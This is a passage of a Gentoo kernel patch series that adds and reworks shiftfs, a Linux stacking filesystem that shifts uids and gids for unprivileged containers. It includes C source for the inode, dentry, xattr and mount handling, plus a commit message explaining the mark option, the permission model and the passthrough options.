++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	if (rmdir)
++		err = vfs_rmdir(reali, new);
++	else
++		err = vfs_unlink(reali, new, NULL);
++
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, false);
++}
++
++static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, true);
++}
++
++static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++			  struct inode *newdir, struct dentry *new,
++			  unsigned int flags)
++{
++	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
++		*realold = old->d_fsdata,
++		*realnew = new->d_fsdata, *trap;
++	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	int err = -EINVAL;
++	const struct cred *oldcred, *newcred;
++
++	trap = lock_rename(rndd, rodd);
++
++	if (trap == realold || trap == realnew)
++		goto out_unlock;
++
++	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
++
++	err = vfs_rename(realolddir, realold, realnewdir,
++			 realnew, NULL, flags);
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++ out_unlock:
++	unlock_rename(rndd, rodd);
++
++	return err;
++}
++
++static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
++				     unsigned int flags)
++{
++	struct dentry *real = dir->i_private, *new;
++	struct inode *reali = real->d_inode, *newi;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock(reali);
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	if (IS_ERR(new))
++		return new;
++
++	dentry->d_fsdata = new;
++
++	newi = NULL;
++	if (!new->d_inode)
++		goto out;
++
++	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
++	if (!newi) {
++		dput(new);
++		return ERR_PTR(-ENOMEM);
++	}
++
++ out:
++	return d_splice_alias(newi, dentry);
++}
++
++static int shiftfs_permission(struct inode *inode, int mask)
++{
++	struct dentry *real = inode->i_private;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	if (mask & MAY_NOT_BLOCK)
++		return -ECHILD;
++
++	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
++	if (iop->permission)
++		err = iop->permission(reali, mask);
++	else
++		err = generic_permission(reali, mask);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++{
++	struct dentry *real = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct iattr newattr = *attr;
++	const struct cred *oldcred, *newcred;
++	struct super_block *sb = dentry->d_sb;
++	int err;
++
++	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
++	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	inode_lock(reali);
++	if (iop->setattr)
++		err = iop->setattr(real, &newattr);
++	else
++		err = simple_setattr(real, &newattr);
++	inode_unlock(reali);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		return err;
++
++	/* all OK, reflect the change on our inode */
++	setattr_copy(d_inode(dentry), attr);
++	return 0;
++}
++
++static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++			   u32 request_mask, unsigned int query_flags)
++{
++	struct inode *inode = path->dentry->d_inode;
++	struct dentry *real = path->dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
++	int err = 0;
++
++	if (iop->getattr)
++		err = iop->getattr(&newpath, stat, request_mask, query_flags);
++	else
++		generic_fillattr(reali, stat);
++
++	if (err)
++		return err;
++
++	/* transform the underlying id */
++	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
++	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	return 0;
++}
++
++static const struct inode_operations shiftfs_inode_ops = {
++	.lookup		= shiftfs_lookup,
++	.getattr	= shiftfs_getattr,
++	.setattr	= shiftfs_setattr,
++	.permission	= shiftfs_permission,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.get_link	= shiftfs_get_link,
++	.readlink	= shiftfs_readlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.create		= shiftfs_create,
++	.mknod		= NULL,	/* no special files currently */
++	.listxattr	= shiftfs_listxattr,
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry)
++{
++	struct inode *inode;
++
++	inode = new_inode(sb);
++	if (!inode)
++		return NULL;
++
++	/*
++	 * our inode is completely vestigial.  All lookups, getattr
++	 * and permission checks are done on the underlying inode, so
++	 * what the user sees is entirely from the underlying inode.
++	 */
++	mode &= S_IFMT;
++
++	inode->i_ino = get_next_ino();
++	inode->i_mode = mode;
++	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++
++	inode->i_op = &shiftfs_inode_ops;
++
++	shiftfs_fill_inode(inode, dentry);
++
++	return inode;
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	if (ssi->mark)
++		seq_show_option(m, "mark", NULL);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
++	if (err)
++		return err;
++
++	buf->f_type = sb->s_magic;
++
++	return 0;
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	mntput(ssi->mnt);
++	put_user_ns(ssi->userns);
++	kfree(ssi);
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	struct shiftfs_data *data = raw_data;
++	char *name = kstrdup(data->path, GFP_KERNEL);
++	int err = -ENOMEM;
++	struct shiftfs_super_info *ssi = NULL;
++	struct path path;
++	struct dentry *dentry;
++
++	if (!name)
++		goto out;
++
++	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
++	if (!ssi)
++		goto out;
++
++	err = -EPERM;
++	err = shiftfs_parse_options(ssi, data->data);
++	if (err)
++		goto out;
++
++	/* to mark a mount point, must be real root */
++	if (ssi->mark && !capable(CAP_SYS_ADMIN))
++		goto out;
++
++	/* else to mount a mark, must be userns admin */
++	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		goto out;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out;
++
++	err = -EPERM;
++
++	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
++		err = -ENOTDIR;
++		goto out_put;
++	}
++
++	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put;
++	}
++
++	if (ssi->mark) {
++		/*
++		 * this part is visible unshifted, so make sure no
++		 * executables that could be used to give suid
++		 * privileges
++		 */
++		sb->s_iflags = SB_I_NOEXEC;
++		ssi->mnt = path.mnt;
++		dentry = path.dentry;
++	} else {
++		struct shiftfs_super_info *mp_ssi;
++
++		/*
++		 * this leg executes if we're admin capable in
++		 * the namespace, so be very careful
++		 */
++		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
++			goto out_put;
++		mp_ssi = path.dentry->d_sb->s_fs_info;
++		if (!mp_ssi->mark)
++			goto out_put;
++		ssi->mnt = mntget(mp_ssi->mnt);
++		dentry = dget(path.dentry->d_fsdata);
++		path_put(&path);
++	}
++	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	sb->s_fs_info = ssi;
++	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_op = &shiftfs_super_ops;
++	sb->s_xattr = shiftfs_xattr_handlers;
++	sb->s_d_op = &shiftfs_dentry_ops;
++	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_root->d_fsdata = dentry;
++
++	return 0;
++
++ out_put:
++	path_put(&path);
++ out:
++	kfree(name);
++	kfree(ssi);
++	return err;
++}
++
++static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
++				    int flags, const char *dev_name, void *data)
++{
++	struct shiftfs_data d = { data, dev_name };
++
++	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
++}
++
++static struct file_system_type shiftfs_type = {
++	.owner		= THIS_MODULE,
++	.name		= "shiftfs",
++	.mount		= shiftfs_mount,
++	.kill_sb	= kill_anon_super,
++	.fs_flags	= FS_USERNS_MOUNT,
++};
++
++static int __init shiftfs_init(void)
++{
++	return register_filesystem(&shiftfs_type);
++}
++
++static void __exit shiftfs_exit(void)
++{
++	unregister_filesystem(&shiftfs_type);
++}
++
++MODULE_ALIAS_FS("shiftfs");
++MODULE_AUTHOR("James Bottomley");
++MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_LICENSE("GPL v2");
++module_init(shiftfs_init)
++module_exit(shiftfs_exit)
+diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
+index 6325d1d0e90f..1f70efb41565 100644
+--- a/include/uapi/linux/magic.h
++++ b/include/uapi/linux/magic.h
+@@ -102,4 +102,6 @@
+ #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
+ #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
+ 
++#define SHIFTFS_MAGIC		0x6a656a62
++
+ #endif /* __LINUX_MAGIC_H__ */
+-- 
+2.39.2
+
+From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+/* Introduction */
+The shiftfs filesystem is implemented as a stacking filesystem. Since it is
+a stacking filesystem it shares concepts with overlayfs and ecryptfs.
+Usually, shiftfs will be stacked upon another filesystem. The filesystem on
+top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
+filesystem it is stacked upon is referred to as "lower filesystem" or
+"underlay".
+
+/* Marked and Unmarked shiftfs mounts */
+To use shiftfs it is necessary that a given mount is marked as shiftable via
+the "mark" mount option. Any mount of shiftfs without the "mark" mount option
+not on top of a shiftfs mount with the "mark" mount option will be refused with
+EPERM.
+After a marked shiftfs mount has been performed other shiftfs mounts
+referencing the marked shiftfs mount can be created. These secondary shiftfs
+mounts are usually what are of interest.
+The marked shiftfs mount will take a reference to the underlying mountpoint of
+the directory it is marking as shiftable. Any unmarked shiftfts mounts
+referencing this marked shifts mount will take a second reference to this
+directory as well. This ensures that the underlying marked shiftfs mount can be
+unmounted thereby dropping the reference to the underlying directory without
+invalidating the mountpoint of said directory since the non-marked shiftfs
+mount still holds another reference to it.
+
+/* Stacking Depth */
+Shiftfs tries to keep the stack as flat as possible to avoid hitting the
+kernel enforced filesystem stacking limit.
+
+/* Permission Model */
+When the mark shiftfs mount is created shiftfs will record the credentials of
+the creator of the super block and stash it in the super block. When other
+non-mark shiftfs mounts are created that reference the mark shiftfs mount they
+will stash another reference to the creators credentials. Before calling into
+the underlying filesystem shiftfs will switch to the creators credentials and
+revert to the original credentials after the underlying filesystem operation
+returns.
+
+/* Mount Options */
+- mark
+  When set the mark mount option indicates that the mount in question is
+  allowed to be shifted. Since shiftfs it mountable in by user namespace root
+  non-initial user namespace this mount options ensures that the system
+  administrator has decided that the marked mount is safe to be shifted.
+  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
+- passthrough={0,1,2,3}
+  This mount options functions as a bitmask. When set to a non-zero value
+  shiftfs will try to act as an invisible shim sitting on top of the
+  underlying filesystem.
+  - 1: Shifts will report the filesystem type of the underlay for stat-like
+       system calls.
+  - 2: Shiftfs will passthrough whitelisted ioctl() to the underlay.
+  - 3: Shiftfs will both use 1 and 2.
+Note that mount options on a marked mount cannot be changed.
+
+/* Extended Attributes */
+Shiftfs will make sure to translate extended attributes.
+
+/* Inodes Numbers */
+Shiftfs inodes numbers are copied up from the underlying filesystem, i.e.
+shiftfs inode numbers will be identical to the corresponding underlying
+filesystem's inode numbers. This has the advantage that inotify and friends
+should work out of the box.
+(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
+ dentries and inodes.)
+
+/* Device Support */
+Shiftfs only supports the creation of pipe and socket devices. Character and
+block devices cannot be created through shiftfs.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig   |   10 +
+ fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
+ 2 files changed, 1493 insertions(+), 369 deletions(-)
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index b53bece1e940..ada9a1234e72 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -136,6 +136,16 @@ config SHIFT_FS
+ 	  unprivileged containers can use this to mount root volumes
+ 	  using this technique.
+ 
++config SHIFT_FS_POSIX_ACL
++	bool "shiftfs POSIX Access Control Lists"
++	depends on SHIFT_FS
++	select FS_POSIX_ACL
++	help
++	  POSIX Access Control Lists (ACLs) support permissions for users and
++	  groups beyond the owner/group/world scheme.
++
++	  If you don't know what Access Control Lists are, say N.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index f7cada126daa..ad1ae5bce6c1 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1,3 +1,4 @@
++#include <linux/capability.h>
+ #include <linux/cred.h>
+ #include <linux/mount.h>
+ #include <linux/file.h>
+@@ -7,83 +8,179 @@
+ #include <linux/kernel.h>
+ #include <linux/magic.h>
+ #include <linux/parser.h>
++#include <linux/security.h>
+ #include <linux/seq_file.h>
+ #include <linux/statfs.h>
+ #include <linux/slab.h>
+ #include <linux/user_namespace.h>
+ #include <linux/uidgid.h>
+ #include <linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/uio.h>
+ 
+ struct shiftfs_super_info {
+ 	struct vfsmount *mnt;
+ 	struct user_namespace *userns;
++	/* creds of process who created the super block */
++	const struct cred *creator_cred;
+ 	bool mark;
++	unsigned int passthrough;
++	struct shiftfs_super_info *info_mark;
+ };
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry);
++struct shiftfs_file_info {
++	struct path realpath;
++	struct file *realfile;
++};
++
++struct kmem_cache *shiftfs_file_info_cache;
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry);
++
++#define SHIFTFS_PASSTHROUGH_NONE 0
++#define SHIFTFS_PASSTHROUGH_STAT 1
++#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
++
++static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
++{
++	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	if (info->info_mark &&
++	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
++		return false;
++
++	return true;
++}
+ 
+ enum {
+ 	OPT_MARK,
++	OPT_PASSTHROUGH,
+ 	OPT_LAST,
+ };
+ 
+ /* global filesystem options */
+ static const match_table_t tokens = {
+ 	{ OPT_MARK, "mark" },
++	{ OPT_PASSTHROUGH, "passthrough=%u" },
+ 	{ OPT_LAST, NULL }
+ };
+ 
+-static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++static const struct cred *shiftfs_override_creds(const struct super_block *sb)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct cred *cred = prepare_creds();
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
+ 
+-	if (!cred)
+-		return NULL;
++	return override_creds(sbinfo->creator_cred);
++}
++
++static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
++					       struct cred *newcred)
++{
++	revert_creds(oldcred);
++	put_cred(newcred);
++}
++
++static int shiftfs_override_object_creds(const struct super_block *sb,
++					 const struct cred **oldcred,
++					 struct cred **newcred,
++					 struct dentry *dentry, umode_t mode,
++					 bool hardlink)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	if (!hardlink) {
++		int err = security_dentry_create_files_as(dentry, mode,
++							  &dentry->d_name,
++							  *oldcred, *newcred);
++		if (err) {
++			shiftfs_revert_object_creds(*oldcred, *newcred);
++			return err;
++		}
++	}
+ 
+-	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
+-	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
+-	put_user_ns(cred->user_ns);
+-	cred->user_ns = get_user_ns(ssi->userns);
++	put_cred(override_creds(*newcred));
++	return 0;
++}
+ 
+-	return cred;
++static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
++			 kuid_t kuid)
++{
++	uid_t uid = from_kuid(from, kuid);
++	return make_kuid(to, uid);
+ }
+ 
+-static const struct cred *shiftfs_new_creds(const struct cred **newcred,
+-					    struct super_block *sb)
++static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
++			 kgid_t kgid)
+ {
+-	const struct cred *cred = shiftfs_get_up_creds(sb);
++	gid_t gid = from_kgid(from, kgid);
++	return make_kgid(to, gid);
++}
+ 
+-	*newcred = cred;
++static void shiftfs_copyattr(struct inode *from, struct inode *to)
++{
++	struct user_namespace *from_ns = from->i_sb->s_user_ns;
++	struct user_namespace *to_ns = to->i_sb->s_user_ns;
++
++	to->i_uid = shift_kuid(from_ns, to_ns, from->i_uid);
++	to->i_gid = shift_kgid(from_ns, to_ns, from->i_gid);
++	to->i_mode = from->i_mode;
++	to->i_atime = from->i_atime;
++	to->i_mtime = from->i_mtime;
++	to->i_ctime = from->i_ctime;
++	i_size_write(to, i_size_read(from));
++}
+ 
+-	if (cred)
+-		cred = override_creds(cred);
+-	else
+-		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++static void shiftfs_copyflags(struct inode *from, struct inode *to)
++{
++	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
+ 
+-	return cred;
++	inode_set_flags(to, from->i_flags & mask, mask);
+ }
+ 
+-static void shiftfs_old_creds(const struct cred *oldcred,
+-			      const struct cred **newcred)
++static void shiftfs_file_accessed(struct file *file)
+ {
+-	if (!*newcred)
++	struct inode *upperi, *loweri;
++
++	if (file->f_flags & O_NOATIME)
+ 		return;
+ 
+-	revert_creds(oldcred);
+-	put_cred(*newcred);
++	upperi = file_inode(file);
++	loweri = upperi->i_private;
++
++	if (!loweri)
++		return;
++
++	upperi->i_mtime = loweri->i_mtime;
++	upperi->i_ctime = loweri->i_ctime;
++
++	touch_atime(&file->f_path);
+ }
+ 
+-static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
++				       char *options)
+ {
+ 	char *p;
+ 	substring_t args[MAX_OPT_ARGS];
+ 
+-	ssi->mark = false;
++	sbinfo->mark = false;
++	sbinfo->passthrough = 0;
+ 
+ 	while ((p = strsep(&options, ",")) != NULL) {
+-		int token;
++		int err, intarg, token;
+ 
+ 		if (!*p)
+ 			continue;
+@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
+ 		token = match_token(p, tokens, args);
+ 		switch (token) {
+ 		case OPT_MARK:
+-			ssi->mark = true;
++			sbinfo->mark = true;
++			break;
++		case OPT_PASSTHROUGH:
++			err = match_int(&args[0], &intarg);
++			if (err)
++				return err;
++
++			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
++				return -EINVAL;
++
++			sbinfo->passthrough = intarg;
+ 			break;
+ 		default:
+ 			return -EINVAL;
+ 		}
+ 	}
++
+ 	return 0;
+ }
+ 
+ static void shiftfs_d_release(struct dentry *dentry)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	dput(real);
++	if (lowerd)
++		dput(lowerd);
+ }
+ 
+ static struct dentry *shiftfs_d_real(struct dentry *dentry,
+ 				     const struct inode *inode)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (inode && d_inode(dentry) == inode)
++		return dentry;
+ 
+-	if (unlikely(real->d_flags & DCACHE_OP_REAL))
+-		return real->d_op->d_real(real, real->d_inode);
++	lowerd = d_real(lowerd, inode);
++	if (lowerd && (!inode || inode == d_inode(lowerd)))
++		return lowerd;
+ 
+-	return real;
++	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
++	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
++	return dentry;
+ }
+ 
+ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_is_negative(lowerd) != d_is_negative(dentry))
+ 		return 0;
+ 
+-	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
+ 
+-	return real->d_op->d_weak_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
++
++	return err;
+ }
+ 
+ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int ret;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_unhashed(lowerd) ||
++	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
+ 		return 0;
+ 
+-	/*
+-	 * inode state of underlying changed from positive to negative
+-	 * or vice versa; force a lookup to update our view
+-	 */
+-	if (d_is_negative(real) != d_is_negative(dentry))
+-		return 0;
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
+ 
+-	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
++		err = lowerd->d_op->d_revalidate(lowerd, flags);
+ 
+-	ret = real->d_op->d_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
+ 
+-	if (ret == 0 && !(flags & LOOKUP_RCU))
+-		d_invalidate(real);
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
+ 
+-	return ret;
++	return err;
+ }
+ 
+ static const struct dentry_operations shiftfs_dentry_ops = {
+-	.d_release	= shiftfs_d_release,
+-	.d_real		= shiftfs_d_real,
+-	.d_revalidate	= shiftfs_d_revalidate,
++	.d_release	   = shiftfs_d_release,
++	.d_real		   = shiftfs_d_real,
++	.d_revalidate	   = shiftfs_d_revalidate,
+ 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
+ };
+ 
+-static int shiftfs_readlink(struct dentry *dentry, char __user *data,
+-			    int flags)
+-{
+-	struct dentry *real = dentry->d_fsdata;
+-	const struct inode_operations *iop = real->d_inode->i_op;
+-
+-	if (iop->readlink)
+-		return iop->readlink(real, data, flags);
+-
+-	return -EINVAL;
+-}
+-
+ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 				    struct delayed_call *done)
+ {
+-	if (dentry) {
+-		struct dentry *real = dentry->d_fsdata;
+-		struct inode *reali = real->d_inode;
+-		const struct inode_operations *iop = reali->i_op;
+-		const char *res = ERR_PTR(-EPERM);
+-
+-		if (iop->get_link)
+-			res = iop->get_link(real, reali, done);
++	const char *p;
++	const struct cred *oldcred;
++	struct dentry *lowerd;
+ 
+-		return res;
+-	} else {
+-		/* RCU lookup not supported */
++	/* RCU lookup not supported */
++	if (!dentry)
+ 		return ERR_PTR(-ECHILD);
+-	}
++
++	lowerd = dentry->d_fsdata;
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	p = vfs_get_link(lowerd, done);
++	revert_creds(oldcred);
++
++	return p;
+ }
+ 
+ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int err = -EOPNOTSUPP;
+-	const struct cred *oldcred, *newcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_setxattr(lowerd, name, value, size, flags);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_setxattr(real, name, value, size, flags);
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(lowerd->d_inode, inode);
+ 
+ 	return err;
+ }
+@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, void *value, size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_getxattr(real, name, value, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_getxattr(lowerd, name, value, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 				 size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_listxattr(real, list, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_listxattr(lowerd, list, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_removexattr(lowerd, name);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_removexattr(real, name);
+-	shiftfs_old_creds(oldcred, &newcred);
++	/* update c/mtime */
++	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
+ 
+ 	return err;
+ }
+@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+-static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
